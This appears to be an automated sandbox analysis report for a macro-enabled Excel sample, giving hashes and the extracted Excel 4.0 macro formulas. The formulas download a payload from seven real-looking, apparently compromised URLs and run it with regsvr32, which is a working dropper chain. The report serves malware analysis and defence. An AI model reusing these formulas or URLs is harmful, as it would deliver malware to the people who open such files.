Behavioral task: behavioral1
Sample: 43447fb4eca835dc3ee164926a695d72c4fe4557503766d08417604207967900.xlsm
Resource: win7-20240729-en

Behavioral task: behavioral2
Sample: 43447fb4eca835dc3ee164926a695d72c4fe4557503766d08417604207967900.xlsm
Resource: win10v2004-20241007-en
General
Target: 43447fb4eca835dc3ee164926a695d72c4fe4557503766d08417604207967900
Size: 38KB
MD5: 14a5b683d63be536a46f49b448767eff
SHA1: ca835d420edffbad031e671b9674f544671a8da8
SHA256: 43447fb4eca835dc3ee164926a695d72c4fe4557503766d08417604207967900
SHA512: a740840a6d55765782872e297bfb7d2fa21c4d5725309139b470135d1e81fa5b33145029c12bfb5016e299eb1022239e606ed35b4780102ebfbb3e2735e70e65
SSDEEP: 768:WhACdvR8DjOZpqcVbZYpoRuBlIiOKMArOooooooooooooooooooooooooooFVIyI:D65YOZZ1ZYpoQ/pMAeVIybs/
Malware Config
Extracted
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.rivabodrumresort.com/eski_site/cM2jewS/","..\roil.ocx",0,0)
=IF('HUNJK'!E15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.kinfri.com/licenses/IHECi5VMo0SY2MD/","..\roil.ocx",0,0))
=IF('HUNJK'!E17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://localart.net/wp-content/uploads/5rH1dzF11HBD/","..\roil.ocx",0,0))
=IF('HUNJK'!E19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://globaltextiles.net/cgi-bin/M2Gi8MLnY/","..\roil.ocx",0,0))
=IF('HUNJK'!E21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://onceintheflow.com/wp-includes/SimplePie/x6zEwt/","..\roil.ocx",0,0))
=IF('HUNJK'!E23<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://sarc.in/wp-admin/ktPHMSvi/","..\roil.ocx",0,0))
=IF('HUNJK'!E25<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.iinil.com/phpmyadmin/bMnR/","..\roil.ocx",0,0))
=IF('HUNJK'!E27<0,CLOSE(0),)
=EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\roil.ocx")
=RETURN()
Signatures
Files
43447fb4eca835dc3ee164926a695d72c4fe4557503766d08417604207967900.xlsm: office2007